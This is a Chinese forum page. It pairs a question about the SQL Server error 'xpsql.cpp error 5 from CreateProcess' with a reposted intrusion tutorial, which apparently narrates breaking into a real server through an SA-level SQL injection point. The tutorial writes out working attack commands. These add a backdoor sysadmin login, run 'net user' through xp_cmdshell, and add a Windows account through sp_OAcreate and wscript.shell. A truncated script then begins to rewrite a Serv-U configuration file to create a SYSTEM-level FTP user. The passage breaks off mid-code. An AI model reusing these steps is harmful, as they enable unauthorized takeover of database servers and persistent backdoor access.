xpsql.cpp: 错误 5 来自 CreateProcess（第 737 行）怎么解决！

xpsql.cpp: 错误 5 来自 CreateProcess（第 737 行）

 

老是遇到这个问题  求高人解决！

作者：伤心的鱼来源：IXPUB技术社区前言:本来这篇文章是年前跟非安全的约稿. 但是不知道什么原因没有发.正好今天整理的时候就找到了.就发到这吧也赚点积分 嘿嘿正文:从本文你可以学到:1.MSSQL中一些扩展的应用2.网站配置文件插入一句话3.如何突破一流信息监控系统这期这篇文章呢其实是比较杂乱的，所以我也不知道题目要用什么好，不过相信我，这篇文章看完之后你一定会学到很多新的在渗透过程中思路，OK，跟我来吧！一、SQL server的灵活应用我们知道在渗透过程中思路是最重要的，有时候往往一个细节就决定成败。呵呵，不过理论终究是理论，看过我以前文章的朋友一定知道，我更喜欢以一个事例来讲解一个东西。因为我只是讲一个思路的问题，所以就不会写很多，只写经典的部分，如果大家需要的话以后我会单独写一篇渗透的文章，来详细介绍每一个方法的使用。OK，我们开始吧！话说前几天朋友丢给我一个SA的注射点.但是死活就是不能执行命令。说问我能不能帮忙看看。既然朋友说话了并且据说是非常BT的SA，自己也愿意挑战下。拿到地址后首先telnet一下它的1433。呵呵，这个可能很多朋友就不会注意为什么要先telnet呢？因为是SA嘛，只要能telnet上去我们就可以在注射点那里执行命令。加一个具有SA权限的sql用户上去，这样在查询分析器里执行命令要比在注射点那里方便的多呢。使用●telnet 61.129.251. x 1433 ●发现可以telnet上去. OK 马上在注射点后面执行:★exec master.dbo.sp_addlogin fishing hook;exec master.dbo.sp_addsrvrolemember fishing,sysadmin★这个命令就是添加一个用户名为fishing密码为hook的SQL用户，权限为SA。两次执行页面都返回成功，说明用户添加成功了。使用SQL server的查询分析器连上，然后执行exec master.dbo.xp_cmdshell 'net user' 发现提示错误：★错误消息50001，级别 1，状态 50001xpsql.cpp: 错误 5 来自 CreateProcess（第 737 行）★很多朋友问过我这个错误信息是什么意思，这里解释一下，其实很简单，那个错误是明明写着 CreateProcess 进程无法创建,而xp_cmdshell 是执行什么进程大家应该知道吧，CMD这个进程无法创建！有可能CMD设置权限拒绝SYSTEM访问，有可能是CMD删除或者改名。以上情况都可以造成 CMD进程无法创建的，如图1。图1javascript:if(this.width>500)this.width=500;">看来直接想加用户登陆服务器是不可能了，可能有的朋友会说：不是还有SP_OAcreate 么？但是我在使用SP_OAcreate执行：★DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user fish sadfish /add'★的时候虽然提示执行成功，但是却发现用户并没有添加进去，初步估计应该是wscript.shell被删掉了。另外如果xp_regwrite 这个存储在的话我们还可以用沙盒模式搞定他的。不过虽然以上三个重要的存储过程都不能用，但是我们还可以用xp_subdirs来列目录。在列到D盘的时候发现了服务器装有serv-u，聪明的朋友们是不是想到了什么？我们可以通过使用FSO在suer-v的●ServUDaemon.ini●里写配置信息添加一个具有system权限的ftp用户，说做就做，首先使用★declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'opentextfile', @f out, 'd:\Serv-U